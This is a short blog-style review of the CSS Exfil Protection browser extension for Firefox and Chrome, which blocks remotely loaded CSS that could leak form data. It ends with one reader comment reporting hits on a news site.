CSS Exfil Protection is an extension for the Firefox and Chrome browsers that claims to block malicious CSS code that could be used to leak your data. It blocks imported CSS or remote linked CSS code that could be secretly capturing the data entered in various field of a webpage.
While completely turning off CSS is not possible or desired, CSS Exfil Protection can selectively block any attempts to load the CSS code from remote location. After the installation, it keeps monitoring all the webpages that you open and scans the loaded CSS code for any suspicious items. When such items are detected, it blocks them and shows the number of items blocked in the toolbar icon.
This extension is created by Mike Gualtieri and you can read more about how CSS data leak works on his blog. He has also provided some PoC examples and a browser tester webpage. You can basically visit this webpage and it will perform four different types of tests to see if your web browser can circumvent CSS based data leaks.
Unfortunately, the extension does not provide any configurable options to the end user. You cannot whistelist any website so that it can avoid blocking any kind of CSS on that website. Furthermore, it assumes that remote fetching of data through CSS is malicious which means that even the harmless websites with harmless CSS are given the same treatment as the possible rogue webpages with malicious CSS code.
You can get CSS Exfil Protection extension for Firefox and Chrome from https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense.
Got 2 hits on: https://arstechnica.com/ Their page is certainly trying to efil data
Comments are closed.